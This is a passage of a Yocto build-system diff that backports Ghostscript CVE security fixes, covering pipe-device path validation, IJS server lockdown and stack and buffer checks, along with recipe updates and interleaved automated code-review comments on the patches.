+- fopen API, if we're using a pipe, we have to add both the full string,
+- (including the '|', and just the command to which we pipe - since at
+- the pipe_fopen(), the leading '|' has been stripped.
+- */
+- code = gs_remove_control_path(mem, gs_permit_file_writing, f);
+- if (code < 0)
+- return code;
+- code = gs_remove_control_path(mem, gs_permit_file_control, f);
+- if (code < 0)
+- return code;
+- break;
+- }
+- if (!IS_WHITESPACE(f[i]))
+- break;
+- }
+- code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++ rewrite_percent_specifiers(f);
++
++ code = gs_remove_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+- return gs_remove_control_path(mem, gs_permit_file_writing, fp);
++ return gs_remove_control_path(mem, gs_permit_file_writing, f);
+ }
+
+ int
+--
+2.25.1
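Review bot: The `base/gp_os2pr.c` hunk cannot compile as written: `const int size_t = strlen(fname);` declares a variable named `size_t`, and the lines after it use `nlen`, which is never declared in the hunk. The other three device files in this patch use `const size_t nlen = strlen(fname);`, and the same line is needed here. The file is OS/2-only, so a Linux build would not notice, which suggests the access validation added for that device has not been built or tested. `os2_printer_fopen` continues outside the hunk.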
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
new file mode 100644
index 0000000000..f312f89e04
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
@@ -0,0 +1,65 @@
+From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 28 Jan 2022 08:21:19 +0000
+Subject: [PATCH] [PATCH] Bug 703902: Fix op stack management in
+ sampled_data_continue()
+
+Replace pop() (which does no checking, and doesn't handle stack extension
+blocks) with ref_stack_pop() which does do all that.
+
+We still use pop() in one case (it's faster), but we have to later use
+ref_stack_pop() before calling sampled_data_sample() which also accesses the
+op stack.
+
+Fixes:
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675
+
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7]
+CVE: CVE-2021-45949
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 13 ++++++++-----
+ 1 file changed, 8 insertions(+), 5 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 0023fa4..f84671f 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8)); /* MSB first */
+ }
+ pop(num_out); /* Move op to base of result values */
+-
++ /* From here on, we have to use ref_stack_pop() rather than pop()
++ so that it handles stack extension blocks properly, before calling
++ sampled_data_sample() which also uses the op stack.
++ */
+ /* Check if we are done collecting data. */
+
+ if (increment_cube_indexes(params, penum->indexes)) {
+ if (stack_depth_adjust == 0)
+- pop(O_STACK_PAD); /* Remove spare stack space */
++ ref_stack_pop(&o_stack, O_STACK_PAD); /* Remove spare stack space */
+ else
+- pop(stack_depth_adjust - num_out);
++ ref_stack_pop(&o_stack, stack_depth_adjust - num_out);
+ /* Execute the closing procedure, if given */
+ code = 0;
+ if (esp_finish_proc != 0)
+@@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
+ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
+ check_op(stack_depth_adjust);
+- pop(stack_depth_adjust);
++ ref_stack_pop(&o_stack, stack_depth_adjust);
+ }
+ else {
+ check_ostack(O_STACK_PAD - stack_depth_adjust);
+- push(O_STACK_PAD - stack_depth_adjust);
++ ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust);
+ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+ make_null(op - i);
+ }
+--
+2.17.1
+
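Review bot: In the second hunk the result of `ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust);` is discarded, although the purpose of the change is to move to the checked stack routines. `ref_stack_push` returns an error code, so the call should be `code = ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust);` followed by `if (code < 0) return code;`. The loop after it still writes through `op` (`make_null(op - i)`). Unlike the `push()` macro it replaces, `ref_stack_push` does not appear to update that local pointer. Confirm against the part of `sampled_data_continue` outside the hunk that `op` is refreshed before the nulls are written.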
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
new file mode 100644
index 0000000000..852f2459f7
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
@@ -0,0 +1,54 @@
+From 37ed5022cecd584de868933b5b60da2e995b3179 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Fri, 24 Mar 2023 13:19:57 +0000
+Subject: [PATCH] Graphics library - prevent buffer overrun in (T)BCP encoding
+
+Bug #706494 "Buffer Overflow in s_xBCPE_process"
+
+As described in detail in the bug report, if the write buffer is filled
+to one byte less than full, and we then try to write an escaped
+character, we overrun the buffer because we don't check before
+writing two bytes to it.
+
+This just checks if we have two bytes before starting to write an
+escaped character and exits if we don't (replacing the consumed byte
+of the input).
+
+Up for further discussion; why do we even permit a BCP encoding filter
+anyway ? I think we should remove this, at least when SAFER is true.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=37ed5022cecd584de868933b5b60da2e995b3179]
+CVE: CVE-2023-28879
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/sbcp.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/base/sbcp.c b/base/sbcp.c
+index 6b0383c..90784b5 100644
+--- a/base/sbcp.c
++++ b/base/sbcp.c
+@@ -1,4 +1,4 @@
+-/* Copyright (C) 2001-2019 Artifex Software, Inc.
++/* Copyright (C) 2001-2023 Artifex Software, Inc.
+ All Rights Reserved.
+
+ This software is provided AS-IS with no warranty, either express or
+@@ -50,6 +50,14 @@ s_xBCPE_process(stream_state * st, stream_cursor_read * pr,
+ byte ch = *++p;
+
+ if (ch <= 31 && escaped[ch]) {
++ /* Make sure we have space to store two characters in the write buffer,
++ * if we don't then exit without consuming the input character, we'll process
++ * that on the next time round.
++ */
++ if (pw->limit - q < 2) {
++ p--;
++ break;
++ }
+ if (p == rlimit) {
+ p--;
+ break;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
new file mode 100644
index 0000000000..a3bbe958eb
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
@@ -0,0 +1,145 @@
+From 5e65eeae225c7d02d447de5abaf4a8e6d234fcea Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 7 Jun 2023 10:23:06 +0100
+Subject: [PATCH] Bug 706761: Don't "reduce" %pipe% file names for permission validation
+
+For regular file names, we try to simplfy relative paths before we use them.
+
+Because the %pipe% device can, effectively, accept command line calls, we
+shouldn't be simplifying that string, because the command line syntax can end
+up confusing the path simplifying code. That can result in permitting a pipe
+command which does not match what was originally permitted.
+
+Special case "%pipe" in the validation code so we always deal with the entire
+string.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=505eab7782b429017eb434b2b95120855f2b0e3c]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 31 +++++++++++++++++++--------
+ base/gslibctx.c | 56 ++++++++++++++++++++++++++++++++++++-------------
+ 2 files changed, 64 insertions(+), 23 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index c4fffae..09ac6b3 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1046,16 +1046,29 @@ gp_validate_path_len(const gs_memory_t *mem,
+ && !memcmp(path + cdirstrl, dirsepstr, dirsepstrl)) {
+ prefix_len = 0;
+ }
+- rlen = len+1;
+- bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+- if (bufferfull == NULL)
+- return gs_error_VMerror;
+-
+- buffer = bufferfull + prefix_len;
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
+
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len+1;
++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
++ if (bufferfull == NULL)
++ return gs_error_VMerror;
++
++ buffer = bufferfull + prefix_len;
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+ while (1) {
+ switch (mode[0])
+ {
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 20c5eee..355c0e3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -719,14 +719,28 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+ return gs_error_rangecheck;
+ }
+
+- rlen = len+1;
+- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+- if (buffer == NULL)
+- return gs_error_VMerror;
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len + 1;
+
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_add_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+
+ n = control->num;
+ for (i = 0; i < n; i++)
+@@ -802,14 +816,28 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+ return gs_error_rangecheck;
+ }
+
+- rlen = len+1;
+- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+- if (buffer == NULL)
+- return gs_error_VMerror;
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len+1;
+
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_remove_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+
+ n = control->num;
+ for (i = 0; i < n; i++) {
+--
+2.25.1
+
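Review bot: On the non-pipe branch the buffer just obtained from `gs_alloc_bytes` is leaked when `gp_file_name_reduce` fails, because the code returns `gs_error_invalidfileaccess` immediately; this applies to `gp_validate_path_len` and to both `gs_*_control_path_len` hunks in `base/gslibctx.c`. The path may come from the job being processed, so the failure path should release the allocation first: `gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path");` before the return in `base/gpmisc.c`, and `gs_free_object(core->memory, buffer, "gs_add_control_path_len");` (with the matching client name in the remove function) in `base/gslibctx.c`. The lines are carried over from the old code, but the patch re-indents them and is a natural place to fix it. All three functions continue outside their hunks.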
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
new file mode 100644
index 0000000000..e8c42f1deb
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
@@ -0,0 +1,60 @@
+From fb342fdb60391073a69147cb71af1ac416a81099 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 14 Jun 2023 09:08:12 +0100
+Subject: [PATCH] Bug 706778: 706761 revisit
+
+Two problems with the original commit. The first a silly typo inverting the
+logic of a test.
+
+The second was forgetting that we actually actually validate two candidate
+strings for pipe devices. One with the expected "%pipe%" prefix, the other
+using the pipe character prefix: "|".
+
+This addresses both those.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=fb342fdb60391073a69147cb71af1ac416a81099]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 2 +-
+ base/gslibctx.c | 4 ++--
+ 2 files changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 09ac6b3..01d449f 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1050,7 +1050,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 355c0e3..d8f74a3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -722,7 +722,7 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+@@ -819,7 +819,7 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+--
+2.25.1
+
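Review bot: The corrected test `len > 5 && memcmp(path, "%pipe", 5) == 0` compares only five bytes, so any name that merely begins with `%pipe` skips path reduction, while the comment above it speaks of `%pipe%`. If only the pipe device is meant, `len > 5 && memcmp(path, "%pipe%", 6) == 0` is the tighter check, and the length guard already guarantees six readable bytes. The same applies at all three sites in `base/gpmisc.c` and `base/gslibctx.c`. `path[0] == '|'` is also evaluated before any length test, so it relies on `len` being non-zero or the string being terminated, which the hunks do not show.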
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
new file mode 100644
index 0000000000..662736bb3d
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
@@ -0,0 +1,62 @@
+From 4ceaf92815302863a8c86fcfcf2347e0118dd3a5 Mon Sep 17 00:00:00 2001
+From: Ray Johnston <ray.johnston@artifex.com>
+Date: Tue, 22 Sep 2020 13:10:04 -0700
+Subject: [PATCH] Fix gp_file allocations to use thread_safe_memory.
+
+The gpmisc.c does allocations for gp_file objects and buffers used by
+gp_fprintf, as well as gp_validate_path_len. The helgrind run with
+-dBGPrint -dNumRenderingThreads=4 and PCL input showed up the gp_fprintf
+problem since the clist rendering would call gp_fprintf using the same
+allocator (PCL's chunk allocator which is non_gc_memory). The chunk
+allocator is intentionally not thread safe (for performance).
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4ceaf92815302863a8c86fcfcf2347e0118dd3a5]
+CVE: CVE-2023-36664 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 34cd71f..c4fffae 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -435,7 +435,7 @@ generic_pwrite(gp_file *f, size_t count, gs_offset_t offset, const void *buf)
+
+ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t size, const char *cname)
+ {
+- gp_file *file = (gp_file *)gs_alloc_bytes(mem->non_gc_memory, size, cname ? cname : "gp_file");
++ gp_file *file = (gp_file *)gs_alloc_bytes(mem->thread_safe_memory, size, cname ? cname : "gp_file");
+ if (file == NULL)
+ return NULL;
+
+@@ -449,7 +449,7 @@ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t
+ memset(((char *)file)+sizeof(*prototype),
+ 0,
+ size - sizeof(*prototype));
+- file->memory = mem->non_gc_memory;
++ file->memory = mem->thread_safe_memory;
+
+ return file;
+ }
+@@ -1047,7 +1047,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ prefix_len = 0;
+ }
+ rlen = len+1;
+- bufferfull = (char *)gs_alloc_bytes(mem->non_gc_memory, rlen + prefix_len, "gp_validate_path");
++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+ if (bufferfull == NULL)
+ return gs_error_VMerror;
+
+@@ -1093,7 +1093,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ break;
+ }
+
+- gs_free_object(mem->non_gc_memory, bufferfull, "gp_validate_path");
++ gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path");
+ #ifdef EACCES
+ if (code == gs_error_invalidfileaccess)
+ errno = EACCES;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
new file mode 100644
index 0000000000..3acb8a503c
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
@@ -0,0 +1,62 @@
+From 8b0f20002536867bd73ff4552408a72597190cbe Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Thu, 24 Aug 2023 15:24:35 +0100
+Subject: [PATCH] IJS device - try and secure the IJS server startup
+
+Bug #707051 ""ijs" device can execute arbitrary commands"
+
+The problem is that the 'IJS' device needs to start the IJS server, and
+that is indeed an arbitrary command line. There is (apparently) no way
+to validate it. Indeed, this is covered quite clearly in the comments
+at the start of the source:
+
+ * WARNING: The ijs server can be selected on the gs command line
+ * which is a security risk, since any program can be run.
+
+Previously this used the awful LockSafetyParams hackery, which we
+abandoned some time ago because it simply couldn't be made secure (it
+was implemented in PostScript and was therefore vulnerable to PostScript
+programs).
+
+This commit prevents PostScript programs switching to the IJS device
+after SAFER has been activated, and prevents changes to the IjsServer
+parameter after SAFER has been activated.
+
+SAFER is activated, unless explicitly disabled, before any user
+PostScript is executed which means that the device and the server
+invocation can only be configured on the command line. This does at
+least provide minimal security against malicious PostScript programs.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5]
+CVE: CVE-2023-43115
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ devices/gdevijs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/devices/gdevijs.c b/devices/gdevijs.c
+index 3d337c5..e50d69f 100644
+--- a/devices/gdevijs.c
++++ b/devices/gdevijs.c
+@@ -934,6 +934,9 @@ gsijs_finish_copydevice(gx_device *dev, const gx_device *from_dev)
+ static const char rgb[] = "DeviceRGB";
+ gx_device_ijs *ijsdev = (gx_device_ijs *)dev;
+
++ if (ijsdev->memory->gs_lib_ctx->core->path_control_active)
++ return_error(gs_error_invalidaccess);
++
+ code = gx_default_finish_copydevice(dev, from_dev);
+ if(code < 0)
+ return code;
+@@ -1363,7 +1366,7 @@ gsijs_put_params(gx_device *dev, gs_param_list *plist)
+ if (code >= 0)
+ code = gsijs_read_string(plist, "IjsServer",
+ ijsdev->IjsServer, sizeof(ijsdev->IjsServer),
+- dev->LockSafetyParams, is_open);
++ ijsdev->memory->gs_lib_ctx->core->path_control_active, is_open);
+
+ if (code >= 0)
+ code = gsijs_read_string_malloc(plist, "DeviceManufacturer",
+--
+2.25.1
+
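Review bot: The guard added in `gsijs_finish_copydevice`, and the `path_control_active` argument now passed to `gsijs_read_string` in `gsijs_put_params`, only take effect once SAFER has been activated. A consumer that starts gs with SAFER explicitly disabled therefore still accepts an arbitrary `IjsServer` command line. The upstream message states this limit, but the recipe-side tag block does not carry it forward for integrators. I would add a line above `Upstream-Status:` such as `Note: only effective while SAFER is active; IjsServer remains an arbitrary command when SAFER is disabled.` Both functions continue outside the quoted hunks.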
diff --git a/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
new file mode 100644
index 0000000000..77eec7d158
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
@@ -0,0 +1,51 @@
+From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 12 Feb 2021 10:34:23 +0000
+Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation.
+
+During function result sampling, after the callout to the Postscript
+interpreter, make sure there is enough stack space available before pushing
+or popping entries.
+
+In thise case, the Postscript procedure for the "function" is totally invalid
+(as a function), and leaves the op stack in an unrecoverable state (as far as
+function evaluation is concerned). We end up popping more entries off the
+stack than are available.
+
+To cope, add in stack limit checking to throw an appropriate error when this
+happens.
+CVE: CVE-2021-45944
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 290809405..652ae02c6 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ } else {
+ if (stack_depth_adjust) {
+ stack_depth_adjust -= num_out;
+- push(O_STACK_PAD - stack_depth_adjust);
+- for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+- make_null(op - i);
++ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
++ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
++ check_op(stack_depth_adjust);
++ pop(stack_depth_adjust);
++ }
++ else {
++ check_ostack(O_STACK_PAD - stack_depth_adjust);
++ push(O_STACK_PAD - stack_depth_adjust);
++ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
++ make_null(op - i);
++ }
+ }
+ }
+
+--
+2.25.1
+
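Review bot: The header tag `Upstream-Status: Backported [...]` uses a different status value from the `Backport` used by the other ghostscript patches in this series, and tooling that validates patch headers may not recognise it. It should read `Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]`. The `CVE: CVE-2021-45944` line also sits directly against the last sentence of the description; a blank line before it would keep the tags in one block, as in the sibling patches.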
diff --git a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
index 65135f5821..e57f592892 100644
--- a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
+++ b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
@@ -19,6 +19,10 @@ DEPENDS_class-native = "libpng-native"
UPSTREAM_CHECK_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases"
UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)\.tar"
+# The jpeg issue in the CVE is present in the gs jpeg sources
+# however we use an external jpeg which doesn't have the issue.
+CVE_CHECK_WHITELIST += "CVE-2013-6629"
+
def gs_verdir(v):
return "".join(v.split("."))
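Review bot: The `CVE_CHECK_WHITELIST += "CVE-2013-6629"` entry is justified only by the comment that an external jpeg is used, and nothing in this hunk shows what enforces that. If a configuration ever builds against the bundled gs jpeg sources, the CVE would stay suppressed in the cve-check output while the affected code is present. I would extend the comment to name the mechanism, e.g. `# Relies on <configure option or do_configure step that selects the system libjpeg>; revisit if that changes.`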
@@ -29,12 +33,24 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d
file://do-not-check-local-libpng-source.patch \
file://avoid-host-contamination.patch \
file://mkdir-p.patch \
+ file://CVE-2020-15900.patch \
+ file://check-stack-limits-after-function-evalution.patch \
+ file://CVE-2021-45949.patch \
+ file://CVE-2021-3781_1.patch \
+ file://CVE-2021-3781_2.patch \
+ file://CVE-2021-3781_3.patch \
+ file://CVE-2023-28879.patch \
+ file://0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch \
+ file://CVE-2023-36664-pre1.patch \
+ file://CVE-2023-36664-1.patch \
+ file://CVE-2023-36664-2.patch \
+ file://CVE-2023-43115.patch \
+ file://CVE-2020-36773.patch \
"
SRC_URI = "${SRC_URI_BASE} \
file://ghostscript-9.21-prevent_recompiling.patch \
file://cups-no-gcrypt.patch \
- file://CVE-2020-15900.patch \
"
SRC_URI_class-native = "${SRC_URI_BASE} \
diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
index ab70ea98a3..7d0f74186e 100644
--- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
+++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master"
SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe"
UPSTREAM_CHECK_COMMITS = "1"
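Review bot: `SRC_URI = "git://${GO_IMPORT};branch=master"` names the branch but still sets no `protocol=` parameter, so the fetch presumably falls back to the git fetcher's default transport, which is neither encrypted nor authenticated. The pinned `SRCREV` limits what a tampered fetch could deliver. If the host behind `GO_IMPORT` serves https, I would still write `SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https"`. `GO_IMPORT` is defined outside this hunk, so the host is an assumption to confirm.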
diff --git a/meta/recipes-extended/grep/grep_3.4.bb b/meta/recipes-extended/grep/grep_3.4.bb
index e176dd727b..46ac4cfb00 100644
--- a/meta/recipes-extended/grep/grep_3.4.bb
+++ b/meta/recipes-extended/grep/grep_3.4.bb
@@ -1,5 +1,6 @@
SUMMARY = "GNU grep utility"
HOMEPAGE = "http://savannah.gnu.org/projects/grep/"
+DESCRIPTION = "Grep searches one or more input files for lines containing a match to a specified pattern. By default, grep prints the matching lines."
BUGTRACKER = "http://savannah.gnu.org/bugs/?group=grep"
SECTION = "console/utils"
LICENSE = "GPLv3"
diff --git a/meta/recipes-extended/groff/files/0001-Include-config.h.patch b/meta/recipes-extended/groff/files/0001-Include-config.h.patch
index 348a61d9df..46065bc513 100644
--- a/meta/recipes-extended/groff/files/0001-Include-config.h.patch
+++ b/meta/recipes-extended/groff/files/0001-Include-config.h.patch
@@ -17,6 +17,9 @@ In file included from TOPDIR/build/tmp/work/aarch64-yoe-linux-musl/groff/1.22.4-
^
./lib/math.h:40:1: error: unknown type name '_GL_INLINE_HEADER_BEGIN'
+We delete eqn.cpp and qen.hpp in do_configure
+to ensure they're regenerated and deterministic.
+
Upstream-Status: Pending
Signed-off-by: Khem Raj <raj.khem@gmail.com>
---
